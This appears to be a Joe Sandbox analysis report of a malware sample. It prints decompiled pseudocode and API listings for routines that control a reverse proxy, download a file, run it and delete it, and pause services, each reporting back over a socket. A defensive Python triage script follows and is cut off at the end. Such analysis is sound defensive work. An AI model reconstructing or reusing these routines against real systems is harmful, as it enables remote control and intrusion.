                                                                      0x0041212a
                                                                      0x0041212e
                                                                      0x0041215b
                                                                      0x0041215b
                                                                      0x00412160
                                                                      0x0041217d
                                                                      0x00000000
                                                                      0x0041217d
                                                                      0x0041216d
                                                                      0x0041216f
                                                                      0x00412171
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412173
                                                                      0x00412175
                                                                      0x0041217a
                                                                      0x0041217a
                                                                      0x00000000
                                                                      0x0041217a
                                                                      0x00412130
                                                                      0x00412133
                                                                      0x00412138
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041213b
                                                                      0x0041214a
                                                                      0x0041214d
                                                                      0x0041214f
                                                                      0x00412152
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412156
                                                                      0x00412157
                                                                      0x00412157
                                                                      0x00412159
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412159
                                                                      0x00412127
                                                                      0x00000000
                                                                      0x00412127
                                                                      0x004120c0
                                                                      0x004120c2
                                                                      0x004120f0
                                                                      0x00000000
                                                                      0x004120f0
                                                                      0x004120c4
                                                                      0x004120c8
                                                                      0x004120ca
                                                                      0x004120d6
                                                                      0x004120dc
                                                                      0x004120dd
                                                                      0x004120e3
                                                                      0x004120ec
                                                                      0x00000000
                                                                      0x004120ec
                                                                      0x004120cc
                                                                      0x00000000
                                                                      0x004120cc
                                                                      0x00411fca
                                                                      0x00411fd0
                                                                      0x00411fd4
                                                                      0x00411fd8
                                                                      0x00411fdb
                                                                      0x00412016
                                                                      0x00412018
                                                                      0x0041201f
                                                                      0x00412028
                                                                      0x0041202e
                                                                      0x00412030
                                                                      0x00412032
                                                                      0x00412036
                                                                      0x0041203a
                                                                      0x0041203d
                                                                      0x0041203d
                                                                      0x00412041
                                                                      0x00412041
                                                                      0x00412043
                                                                      0x0041204c
                                                                      0x00412055
                                                                      0x0041205d
                                                                      0x0041205e
                                                                      0x00412060
                                                                      0x0041206f
                                                                      0x0041206f
                                                                      0x00412073
                                                                      0x00412077
                                                                      0x00412077
                                                                      0x0041207a
                                                                      0x00412090
                                                                      0x00412092
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412094
                                                                      0x0041209a
                                                                      0x0041209b
                                                                      0x0041209e
                                                                      0x004120ad
                                                                      0x004120ad
                                                                      0x004120ad
                                                                      0x004120ad
                                                                      0x00000000
                                                                      0x004120ad
                                                                      0x004120a0
                                                                      0x004120a5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004120a7
                                                                      0x00000000
                                                                      0x004120a7
                                                                      0x0041207c
                                                                      0x00412088
                                                                      0x00000000
                                                                      0x00412088
                                                                      0x00412062
                                                                      0x00412066
                                                                      0x00412069
                                                                      0x00000000
                                                                      0x00412069
                                                                      0x00412047
                                                                      0x00412048
                                                                      0x0041204a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041204a
                                                                      0x0041201a
                                                                      0x0041201d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041201d
                                                                      0x00411fde
                                                                      0x00411fe4
                                                                      0x00411fe7
                                                                      0x00411fe9
                                                                      0x00411ff0
                                                                      0x00411ff6
                                                                      0x00411ff7
                                                                      0x00411ffc
                                                                      0x00412003
                                                                      0x00000000
                                                                      0x00412003
                                                                      0x00411f38
                                                                      0x00411f3b
                                                                      0x0041200c
                                                                      0x00000000
                                                                      0x0041200c
                                                                      0x00411f41
                                                                      0x00411f44
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00411f4a
                                                                      0x00411f4d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00411f53
                                                                      0x00411f56
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00411f5c
                                                                      0x00411f5e
                                                                      0x00411f62
                                                                      0x00411f65
                                                                      0x00411f75
                                                                      0x00411f75
                                                                      0x00411f78
                                                                      0x00411f8a
                                                                      0x00411f8a
                                                                      0x00411f8d
                                                                      0x00411f8f
                                                                      0x00411faa
                                                                      0x00411fad
                                                                      0x00000000
                                                                      0x00411fad
                                                                      0x00411f91
                                                                      0x00411f94
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00411f96
                                                                      0x00411f99
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00411f9b
                                                                      0x00411f9e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00411fa0
                                                                      0x00411f7a
                                                                      0x00411f7e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00411f80
                                                                      0x00411f67
                                                                      0x00411f69
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00411f26
                                                                      0x00000000
                                                                      0x00411f26

Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID:
• String ID: tcp$udp
• API String ID: 0-3725065008
• Opcode ID: e89efb45e4dd410997156192ae004f7025f315133890a8e52688e2807c50f323
• Instruction ID: 7d6c78578f136db0db5ceb6428d566dd922d82de6985a768940b76d152640948
• Opcode Fuzzy Hash: e89efb45e4dd410997156192ae004f7025f315133890a8e52688e2807c50f323
• Instruction Fuzzy Hash: 337178306083029FD724CF15D6446ABBBE0AB98344F14452FFA85C7361E7B8CD96CB9A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%
			E0040F07F(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t26;
				char* _t34;
				char* _t37;
				intOrPtr _t50;
				char* _t51;
				char* _t58;
				intOrPtr _t60;
				intOrPtr _t61;
				char* _t65;
				void* _t68;
				intOrPtr _t121;
				void* _t125;
				void* _t128;
				void* _t130;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t139;
				void* _t140;
				void* _t141;
				void* _t145;

				_t147 = __eflags;
				_t111 = __edx;
				_push(_t68);
				_t121 = _a4;
				E004020B6(_t68,  &_v76, __edx, __eflags, _t121 + 0xc);
				SetEvent( *(_t121 + 0x24));
				_t26 = E00401F6B( &_v80);
				E00404162( &_v80,  &_v56, 4, 0xffffffff);
				_t139 = (_t136 & 0xfffffff8) - 0x3c;
				E004020B6(0x46e260, _t139, _t111, _t147, 0x46e260);
				_t140 = _t139 - 0x18;
				E004020B6(0x46e260, _t140, _t111, _t147,  &_v72);
				E0041851D( &_v112, _t111);
				_t141 = _t140 + 0x30;
				_t125 =  *_t26 - 0x46;
				if(_t125 == 0) {
					E00401E25( &_v88, _t111, _t135, __eflags, 1);
					_t34 = E0040243C();
					E00401F6B(E00401E25( &_v92, _t111, _t135, __eflags, 1));
					_t112 = _t34;
					_t37 = E0040F872();
					_t127 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						_t128 = _t141 - 0x18;
						_push("1");
						L19:
						_t111 = E00402EF1( &_v32, E00401E25( &_v88, _t112, _t135, __eflags, 0), _t135, 0x46e260);
						E0040793B(0x46e260, _t128, _t39, _t121, _t135, __eflags);
						_push(0x85);
						E00404A78(_t121, _t39, __eflags);
						E00401F98();
						L20:
						E00401E4D( &_v108, _t111);
						E00401F98();
						E00401F98();
						return 0;
					}
					 *0x46dd34 = E0040FAE7(_t127, "StartForward");
					 *0x46dd30 = E0040FAE7(_t127, "StartReverse");
					 *0x46dd38 = E0040FAE7(_t127, "StopForward");
					_t50 = E0040FAE7(_t127, "StopReverse");
					_t112 = "GetDirectListeningPort";
					 *0x46dd40 = _t50;
					_t51 = E0040FAE7(_t127, "GetDirectListeningPort");
					__eflags =  *0x46dd34;
					 *0x46dd3c = _t51;
					if(__eflags == 0) {
						L17:
						_t128 = _t141 - 0x18;
						_push("2");
						goto L19;
					}
					__eflags =  *0x46dd30;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x46dd38;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t51;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x46dd01 = 1;
					E004020B6(0x46e260, _t141 - 0x18, "GetDirectListeningPort", __eflags, E00401E25( &_v88, "GetDirectListeningPort", _t135, __eflags, 0));
					_push(0x76);
					L10:
					E00404A78(_t121, _t112, __eflags);
					goto L20;
				}
				_t130 = _t125 - 1;
				if(_t130 == 0) {
					_t58 =  *0x46dd34(E004383EC(_t55, E00401F6B(E00401E25( &_v88, _t111, _t135, __eflags, 0))));
					_t145 = _t141 - 0x14;
					L9:
					_t112 = _t58;
					E004182D1(0x46e260, _t145, _t58);
					_push(0x77);
					goto L10;
				}
				_t131 = _t130 - 1;
				if(_t131 == 0) {
					_t60 =  *0x46dacc; // 0x0
					_t61 =  *((intOrPtr*)(_t60 + 0x18));
					__imp__#12( *((intOrPtr*)(_t61 + 4)));
					_t65 =  *0x46dd30(_t61, E004383EC(_t62, E00401F6B(E00401E25( &_v92, _t111, _t135, __eflags, 0))) & 0x0000ffff);
					__eflags = _t65;
					_t109 =  !=  ? 1 :  *0x46dd02 & 0x000000ff;
					 *0x46dd02 =  !=  ? 1 :  *0x46dd02 & 0x000000ff;
					_t112 = _t65;
					E004182D1(0x46e260, _t141 - 0x10, _t65);
					_push(0x78);
					goto L10;
				}
				_t133 = _t131 - 1;
				if(_t133 == 0) {
					_t58 =  *0x46dd38();
					_t145 = _t141 - 0x18;
					goto L9;
				}
				if(_t133 == 1) {
					 *0x46dd40();
					 *0x46dd02 = 0;
				}
				goto L20;
			}

APIs
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
• API String ID: 3578746661-168337528
• Opcode ID: ca4cbf4a710a1dffe4970b9c771ea6e8593c9dde921f1a806264f8c51899bd72
• Instruction ID: 76d52ed6f850256a9c7d93c3e4990458ec236edd804395ae2c42ed6eff791a8c
• Opcode Fuzzy Hash: ca4cbf4a710a1dffe4970b9c771ea6e8593c9dde921f1a806264f8c51899bd72
• Instruction Fuzzy Hash: B8519331F042009BC624BB35D95AA6E36A5AB85308F40453FF401ABAE1EF7D8D09C78F
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 73%
			E00414A98(void* __edx, void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t90;
				void* _t91;

				_t94 = __eflags;
				_t33 = E00402053(_t60,  &_v136, __edx, _t90, "\\");
				_t87 = E004052D4(_t60,  &_v112, E00438A1A(_t60, __eflags, "Temp"), _t90, _t94, _t33);
				E00402ED0(_t60,  &_v28, _t35, _t90, _t94,  &_a4);
				E00401F98();
				_t68 =  &_v136;
				E00401F98();
				_push(_t68);
				_push(_t68);
				_t41 = E00414CD5(E0040D72E( &_v316, _t35, _t94, E00401F6B( &_v28), 0x10),  &_v316);
				_t95 = _t41;
				if(_t41 == 0) {
					E00402053(_t60, _t91 - 0x18, _t87, _t90, 0x461084);
					_push(0x6f);
					_t73 = 0x46e8e8;
					goto L6;
				} else {
					_t87 =  &_a28;
					E00414CE5( &_v316,  &_a28, _t95);
					E0040D6DF( &_v316,  &_a28, _t95);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = E00401F6B( &_v28);
					asm("movaps xmm0, [0x467b30]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t97 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E00402053(_t60, _t91,  &_a28, _t90, 0x461084);
						_push(0x70);
						E00404A78(0x46e8e8, _t87, _t97);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(E00401F6B( &_v28));
					}
					_t98 = _t60 - 1;
					if(_t60 == 1) {
						E00402053(_t60, _t91 - 0x18, _t87, _t90, 0x461084);
						_push(0x6e);
						_t73 = 0x46e8e8;
						L6:
						E00404A78(_t73, _t87, _t98);
					}
				}
				E0040CD94(_t60,  &_v316, 0x461084);
				E00401F98();
				E00401F98();
				return E00401F98();
			}
                                                                      0x00414a98
                                                                      0x00414ab3
                                                                      0x00414acf
                                                                      0x00414ad4
                                                                      0x00414add
                                                                      0x00414ae2
                                                                      0x00414ae8
                                                                      0x00414aed
                                                                      0x00414aee
                                                                      0x00414b0b
                                                                      0x00414b10
                                                                      0x00414b12
                                                                      0x00414bd3
                                                                      0x00414bd8
                                                                      0x00414bda
                                                                      0x00000000
                                                                      0x00414b18
                                                                      0x00414b18
                                                                      0x00414b21
                                                                      0x00414b2c
                                                                      0x00414b31
                                                                      0x00414b38
                                                                      0x00414b3c
                                                                      0x00414b43
                                                                      0x00414b4a
                                                                      0x00414b4f
                                                                      0x00414b56
                                                                      0x00414b5d
                                                                      0x00414b73
                                                                      0x00414b76
                                                                      0x00414b7a
                                                                      0x00414b82
                                                                      0x00414b87
                                                                      0x00414b8b
                                                                      0x00414b95
                                                                      0x00414b9e
                                                                      0x00414bad
                                                                      0x00414bad
                                                                      0x00414bb3
                                                                      0x00414bb6
                                                                      0x00414bbe
                                                                      0x00414bc3
                                                                      0x00414bc5
                                                                      0x00414bdf
                                                                      0x00414bdf
                                                                      0x00414bdf
                                                                      0x00414bb6
                                                                      0x00414bea
                                                                      0x00414bf2
                                                                      0x00414bfa
                                                                      0x00414c0d

                                                                      APIs
                                                                        • Part of subcall function 00414CE5: __EH_prolog.LIBCMT ref: 00414CEA
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00461084), ref: 00414B95
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00414B9E
                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00414BAD
                                                                      • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00414B61
                                                                        • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                      • String ID: <$@$Temp
                                                                      • API String ID: 1704390241-1032778388
                                                                      • Opcode ID: cb7a10c681e402de1a51f3ed916c28cc6a8f75b74a7a391232d8617e3acadb7e
                                                                      • Instruction ID: fbeb40d35a52a9f2c07a2ad59e65b24144671cb58ffc0d3941be7302ec8cf352
                                                                      • Opcode Fuzzy Hash: cb7a10c681e402de1a51f3ed916c28cc6a8f75b74a7a391232d8617e3acadb7e
                                                                      • Instruction Fuzzy Hash: 56417E319042099ACB14FBA1DC56AFE7734AF50358F40416EF506760E1EF781A8ACB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 88%
                                                                      			E00406335(intOrPtr __ecx, void* __eflags, intOrPtr _a8, char _a12, char _a16, void* _a36, char _a40, void _a52, char _a64, intOrPtr _a100052, intOrPtr _a100072, char _a100080) {
                                                                      				long _v0;
                                                                      				char _v8;
                                                                      				char _v12;
                                                                      				intOrPtr _v16;
                                                                      				intOrPtr _v20;
                                                                      				void* __ebx;
                                                                      				void* __ebp;
                                                                      				WCHAR* _t35;
                                                                      				long _t42;
                                                                      				struct _OVERLAPPED* _t54;
                                                                      				intOrPtr _t72;
                                                                      				intOrPtr _t74;
                                                                      				long _t76;
                                                                      				void* _t77;
                                                                      				void* _t78;
                                                                      				void* _t80;
                                                                      				void* _t82;
                                                                      				void* _t83;
                                                                      				void* _t85;
                                                                      
                                                                      				_t82 = __eflags;
                                                                      				E00453420();
                                                                      				_push(_t77);
                                                                      				_t74 = __ecx;
                                                                      				_t69 =  &_a100080;
                                                                      				asm("xorps xmm0, xmm0");
                                                                      				_a8 = __ecx;
                                                                      				_t54 = 0;
                                                                      				asm("movlpd [esp+0x10], xmm0");
                                                                      				_a12 = 0;
                                                                      				E00403222(0,  &_a16, _t77, _t82, E004078F9( &_a40,  &_a100080, _t77, L".part"));
                                                                      				E00401EC9();
                                                                      				_t78 = CreateFileW(E00401EC4( &_a12), 4, 0, 0, 2, 0x80, 0);
                                                                      				_t83 = _v0 - _a100072;
                                                                      				if(_t83 > 0) {
                                                                      					L6:
                                                                      					CloseHandle(_t78);
                                                                      					_t35 = E00401EC4( &_a100080);
                                                                      					MoveFileW(E00401EC4( &_a16), _t35);
                                                                      					_t54 = 1;
                                                                      				} else {
                                                                      					_t72 = _a100072;
                                                                      					if(_t83 >= 0) {
                                                                      						L5:
                                                                      						if(_v0 < _t72) {
                                                                      							goto L2;
                                                                      						} else {
                                                                      							goto L6;
                                                                      						}
                                                                      					} else {
                                                                      						while(1) {
                                                                      							L2:
                                                                      							_t42 = E00404B6D(_t74,  &_a64, 0x186a0);
                                                                      							_t76 = _t42;
                                                                      							asm("cdq");
                                                                      							_v12 = _v12 + _t42;
                                                                      							asm("adc [esp+0x18], edx");
                                                                      							WriteFile(_t78,  &_a52, _t76,  &_v0, _t54);
                                                                      							_t80 = _t80 - 0x18;
                                                                      							E00402077(_t54, _t80, _t69, _t78, _t83,  &_v12, 8);
                                                                      							E00404A78(_v12, _t69, _t83, 0x57, _v12);
                                                                      							if(_t76 <= 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t74 = _v16;
                                                                      							_t85 = _v20 - _a100052;
                                                                      							if(_t85 < 0) {
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t85 > 0) {
                                                                      									goto L6;
                                                                      								} else {
                                                                      									goto L5;
                                                                      								}
                                                                      							}
                                                                      							goto L7;
                                                                      						}
                                                                      						CloseHandle(_t78);
                                                                      						DeleteFileW(E00401EC4( &_v8));
                                                                      					}
                                                                      				}
                                                                      				L7:
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				return _t54;
                                                                      			}
                                                                      0x00406335
                                                                      0x0040633a
                                                                      0x00406340
                                                                      0x00406342
                                                                      0x00406344
                                                                      0x0040634c
                                                                      0x0040634f
                                                                      0x00406353
                                                                      0x00406355
                                                                      0x00406364
                                                                      0x00406373
                                                                      0x0040637c
                                                                      0x0040639d
                                                                      0x004063a6
                                                                      0x004063aa
                                                                      0x0040641e
                                                                      0x0040641f
                                                                      0x0040642c
                                                                      0x0040643c
                                                                      0x00406442
                                                                      0x004063ac
                                                                      0x004063ac
                                                                      0x004063b3
                                                                      0x00406418
                                                                      0x0040641c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004063b5
                                                                      0x004063b5
                                                                      0x004063b5
                                                                      0x004063c2
                                                                      0x004063c7
                                                                      0x004063c9
                                                                      0x004063ca
                                                                      0x004063d3
                                                                      0x004063df
                                                                      0x004063e5
                                                                      0x004063f1
                                                                      0x004063fc
                                                                      0x00406403
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040640c
                                                                      0x00406410
                                                                      0x00406414
                                                                      0x00000000
                                                                      0x00406416
                                                                      0x00406416
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406416
                                                                      0x00000000
                                                                      0x00406414
                                                                      0x00406467
                                                                      0x00406477
                                                                      0x00406477
                                                                      0x004063b3
                                                                      0x00406444
                                                                      0x00406448
                                                                      0x00406454
                                                                      0x00406465

                                                                      APIs
                                                                      • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,0046E260,00460F88,?,00000000,0040678D,00000000), ref: 00406397
                                                                      • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040678D,00000000,?,?,0000000A,00000000), ref: 004063DF
                                                                        • Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,0040678D,00000000,?,?,0000000A,00000000), ref: 0040641F
                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 0040643C
                                                                      • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406467
                                                                      • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406477
                                                                        • Part of subcall function 00404B6D: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0046E278,00404C20,00000000,00000000,00000000,?,0046E278,R@), ref: 00404B7C
                                                                        • Part of subcall function 00404B6D: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405462), ref: 00404B9A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                      • String ID: .part
                                                                      • API String ID: 1303771098-3499674018
                                                                      • Opcode ID: 798f1f7071e4ee0b4ce41177e1129b2153cd15b0a3cf4394d810e954a4b78364
                                                                      • Instruction ID: 6fb8a973e12795c2698763c1ab66a8abeeba72767a8ffa267f2143bb89f398c1
                                                                      • Opcode Fuzzy Hash: 798f1f7071e4ee0b4ce41177e1129b2153cd15b0a3cf4394d810e954a4b78364
                                                                      • Instruction Fuzzy Hash: F0319171504351AFC210EB21DC5599FB3E8EF84349F00493EF946A61E2DB78AA488B9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00417428(char _a4) {
                                                                      				struct _SERVICE_STATUS _v32;
                                                                      				void* _t6;
                                                                      				signed int _t16;
                                                                      				void* _t19;
                                                                      				void* _t20;
                                                                      
                                                                      				_t16 = 0;
                                                                      				_t6 = OpenSCManagerW(0, 0, 0x40);
                                                                      				_t1 =  &_a4; // 0x416e21
                                                                      				_t20 = _t6;
                                                                      				_t19 = OpenServiceW(_t20, E00401EC4(_t1), 0x40);
                                                                      				if(_t19 != 0) {
                                                                      					_t16 = 0 | ControlService(_t19, 2,  &_v32) != 0x00000000;
                                                                      					CloseServiceHandle(_t20);
                                                                      					CloseServiceHandle(_t19);
                                                                      				} else {
                                                                      					CloseServiceHandle(_t20);
                                                                      				}
                                                                      				E00401EC9();
                                                                      				return _t16;
                                                                      			}
                                                                      0x00417433
                                                                      0x00417437
                                                                      0x0041743f
                                                                      0x00417442
                                                                      0x00417451
                                                                      0x00417455
                                                                      0x00417476
                                                                      0x00417479
                                                                      0x0041747c
                                                                      0x00417457
                                                                      0x00417458
                                                                      0x00417458
                                                                      0x00417481
                                                                      0x0041748e

                                                                      APIs
                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00416E21,00000000), ref: 00417437
                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00416E21,00000000), ref: 0041744B
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416E21,00000000), ref: 00417458
                                                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00416E21,00000000), ref: 00417467
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416E21,00000000), ref: 00417479
                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00416E21,00000000), ref: 0041747C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Service$CloseHandle$Open$ControlManager
                                                                      • String ID: !nA
                                                                      • API String ID: 221034970-1013695210
                                                                      • Opcode ID: dd1b822d362b7800f214d3c755142f6096ecd04e465fbb94400992cd749a0077
                                                                      • Instruction ID: 15a54400799d2b468692d2dab35677395eb76679f6786d8cdad390a39cdf9a1b
                                                                      • Opcode Fuzzy Hash: dd1b822d362b7800f214d3c755142f6096ecd04e465fbb94400992cd749a0077
                                                                      • Instruction Fuzzy Hash: FBF0C8715042187BD2106B65DC49EBF3B7CDB8576AB100026FE09961D2DA38CD8685F9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
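The three decompiled routines above are easiest to triage from their "APIs" listings rather than from the pseudocode: the first launches a file through ShellExecuteExA with SEE_MASK_NOCLOSEPROCESS (0x40), waits on the process and deletes the file; the second streams data into a ".part" file in 0x186a0-byte chunks and MoveFileW's it into place; the third opens a service and sends it control code 2 (SERVICE_CONTROL_PAUSE). The script below is an added example, not part of the Joe Sandbox report or of the sample's own code. It parses API lines in the report's format, orders the direct calls of each function by their ref address (the listing order is not call order: in the first function ShellExecuteExA at 00414B61 is printed after DeleteFileA at 00414BAD), and matches ordered API sequences against a few behaviour rules. The sample inputs are the API lines copied from this page; the rule names, the `triage` function and the CREATE_ALWAYS / control-code predicates are my own choices.

```python
"""Behavioural triage of Joe Sandbox per-function 'APIs' listings (added example)."""
import re
from dataclasses import dataclass, field
from typing import Callable, Optional

# One report line: optional "Part of subcall function XXXX:", API.MODULE, optional
# "(args)", then "ref: ADDR". Args that are not 8 hex digits (e.g. "?") become None.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int
    nested: Optional[int]   # address of the subcall function this line belongs to, if any

def parse_arg(tok: str):
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None

def parse_api_lines(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls

@dataclass
class Rule:
    name: str
    sequence: list                       # tuples of acceptable API names, in call order
    where: dict = field(default_factory=dict)  # api name -> predicate over its args
    note: str = ""

def matches(rule: Rule, calls: list, order_by_ref: bool = True) -> bool:
    """Ordered-subsequence match over the function's direct calls."""
    direct = [c for c in calls if c.nested is None]
    if order_by_ref:                     # listing order != call order; ref address is
        direct.sort(key=lambda c: c.ref)
    i = 0
    for c in direct:
        if i == len(rule.sequence):
            break
        if c.api in rule.sequence[i]:
            pred: Optional[Callable] = rule.where.get(c.api)
            if pred is None or pred(c.args):
                i += 1
    return i == len(rule.sequence)

RULES = [
    Rule("run_then_delete",
         [("ShellExecuteExA", "ShellExecuteExW"), ("WaitForSingleObject",),
          ("DeleteFileA", "DeleteFileW")],
         note="launches a file, waits for it to exit, then deletes it"),
    Rule("staged_file_write",
         [("CreateFileW",), ("WriteFile",), ("MoveFileW",)],
         where={"CreateFileW": lambda a: len(a) > 4 and a[4] == 2},   # CREATE_ALWAYS
         note="writes a temp file (.part on this page) then renames it into place"),
    Rule("service_control",
         [("OpenSCManagerW",), ("OpenServiceW",), ("ControlService",)],
         where={"ControlService": lambda a: len(a) > 1 and a[1] in (1, 2, 3)},  # STOP/PAUSE/CONTINUE
         note="sends STOP(1)/PAUSE(2)/CONTINUE(3) to a named service"),
]
RULE_BY_NAME = {r.name: r for r in RULES}

def triage(text: str) -> dict:
    calls = parse_api_lines(text)
    hits = {r.name: r.note for r in RULES if matches(r, calls)}
    if any(c.api == "send" for c in calls):     # send() reached via subcall = status to C2
        hits["reports_to_socket"] = "result is sent over a socket (send via subcall)"
    return hits

# Sample inputs: API lines copied from the three function listings on this page.
FUNC_414A98 = """
• Part of subcall function 00414CE5: __EH_prolog.LIBCMT ref: 00414CEA
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00461084), ref: 00414B95
• CloseHandle.KERNEL32(00000000), ref: 00414B9E
• DeleteFileA.KERNEL32(00000000), ref: 00414BAD
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00414B61
• Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D
"""
FUNC_406335 = """
• CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,0046E260,00460F88,?,00000000,0040678D,00000000), ref: 00406397
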